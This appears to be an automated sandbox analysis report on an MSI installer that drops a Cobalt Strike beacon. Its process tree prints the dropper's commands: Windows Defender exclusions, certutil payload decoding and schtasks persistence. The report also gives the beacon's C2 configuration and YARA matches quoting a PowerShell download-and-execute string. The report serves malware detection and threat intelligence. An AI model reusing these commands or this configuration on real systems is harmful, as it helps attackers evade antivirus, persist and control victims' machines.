Edit tour

Windows Analysis Report
1eSOBjseu2.msi

Overview

General Information

Sample name:	1eSOBjseu2.msi renamed because original name is a hash value
Original sample name:	29dd2916c20e18b713a8ecb72d3df632961e818cf35484ec6bafedc2ff415680.msi
Analysis ID:	1487470
MD5:	616bc662c460329dd73754a96e59277b
SHA1:	0131fc44067c83e3efd8dfe12029e7df0b44f4a3
SHA256:	29dd2916c20e18b713a8ecb72d3df632961e818cf35484ec6bafedc2ff415680
Tags:	45-76-192-215CobaltStrikemsi
Infos:

Detection

CobaltStrike

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected CobaltStrike

Yara detected Powershell download and execute

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Contains functionality to detect sleep reduction / modifications

Drops PE files to the user root directory

Found API chain indicative of debugger detection

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Legitimate Application Dropped Executable

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Program Location with Network Connections

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Uses schtasks.exe or at.exe to add and modify task schedules

Adds / modifies Windows certificates

Checks for available system drives (often done to infect USB drives)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 7640 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1eSOBjseu2.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7712 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 7784 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0985FCADD1B04D258216E8A4DAB0DBB9 MD5: 9D09DC1EDA745A5F87553048E57620CF)

aipackagechainer.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe" MD5: 10F3B7105634BEF29E229ECDA63E08C1)

Desktop.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe" MD5: D2733BF9C81DDF4F730C65FCE8E02629)

cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8072 cmdline: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7688 cmdline: powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)

certutil.exe (PID: 4268 cmdline: certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe MD5: F17616EC0522FC5633151F7CAA278CAA)

schtasks.exe (PID: 7904 cmdline: SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

WmiPrvSE.exe (PID: 7928 cmdline: C:\Users\Public\WmiPrvSE.exe MD5: 29FA5E4FD104FD12A870D2DD90E42B31)

powershell.exe (PID: 8116 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1148 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1840 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 932 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3756 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Cobalt Strike, CobaltStrike	Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.	APT 29 APT32 APT41 AQUATIC PANDA Anunak Cobalt Codoso CopyKittens DarkHydrus FIN6 FIN7 Leviathan Mustang Panda Shell Crew Stone Panda TianWu UNC1878 UNC2452 Winnti Umbrella	http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems http://blog.nsfocus.net/murenshark http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"BeaconType": ["HTTPS"], "Port": 59611, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "45.76.192.215,/load", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x32d6a:$a11: Could not open service control manager on %s: %d 0x3329c:$a12: %d is an x64 process (can't inject x86 content) 0x332cc:$a13: %d is an x86 process (can't inject x64 content) 0x335ed:$a14: Failed to impersonate logged on user %d (%u) 0x33255:$a15: could not create remote thread in %d: %d 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33203:$a17: could not write to process memory: %d 0x32d9b:$a18: Could not create service %s on %s: %d 0x32e24:$a19: Could not delete service %s on %s: %d 0x32c89:$a20: Could not open process token: %d (%u)
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x334b2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x334fc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x3: %d is an x86 process (can't inject x64 content) 0x32c89:$s1: Could not open process token: %d (%u) 0x329a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s4: Could not connect to pipe (%s): %d
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x41bf1:$loader_export: ReflectiveLoader 0x32960:$exportname: beacon.dll
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3329c:$x2: %d is an x64 process (can't inject x86 content) 0x335ed:$x3: Failed to impersonate logged on user %d (%u) 0x334fc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x334b2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x32c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x33203:$s4: could not write to process memory: %d 0x329a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s6: Could not connect to pipe (%s): %d
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x33970:$str1: %s (admin) 0x32960:$str2: beacon.dll
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x334fc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x2: %d is an x86 process (can't inject x64 content) 0x334b2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33596:$x4: Failed to impersonate token from %d (%u) 0x335ed:$x5: Failed to impersonate logged on user %d (%u) 0x329a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3348a:$s1: %%IMPORT%% 0x32987:$s2: www6.%x%x.%s 0x3297b:$s3: cdn.%x%x.%s 0x32c03:$s4: api.%x%x.%s 0x33970:$s5: %s (admin) 0x32c72:$s6: could not spawn %s: %d 0x3352e:$s7: Could not kill %d: %d 0x32d47:$s8: Could not connect to pipe (%s): %d 0x32994:$s9: %s.1%x.%x%x.%s 0x329a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x32b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x32ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x32bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x32bdd:$s9: %s.1%08x%08x.%x%x.%s 0x32bf2:$s9: %s.1%08x.%x%x.%s
Process Memory Space: WmiPrvSE.exe PID: 7928	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 7928	JoeSecurity_CobaltStrike_1	Yara detected CobaltStrike	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 7928	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 7928	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 7928	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 7928	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2c1f0:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4a0c4:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2c268:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4a13c:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2c9cd:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x4a8a1:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2ccf5:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x4abc9:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2cc87:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2ccf5:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x4ab5b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x4abc9:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2c2cb:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4a19f:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2c45c:$a7: could not run command (w/ token) because of its length of %d bytes! 0x4a330:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2c311:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x4a1e5:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2c34f:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x4a223:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2cd3f:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
Process Memory Space: WmiPrvSE.exe PID: 7928	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3131b:$loader_export: ReflectiveLoader 0x3133a:$loader_export: ReflectiveLoader 0x4f39c:$loader_export: ReflectiveLoader 0x4f3bb:$loader_export: ReflectiveLoader 0x2c02c:$exportname: beacon.dll 0x2c1b5:$exportname: beacon.dll 0x49efe:$exportname: beacon.dll 0x4a089:$exportname: beacon.dll
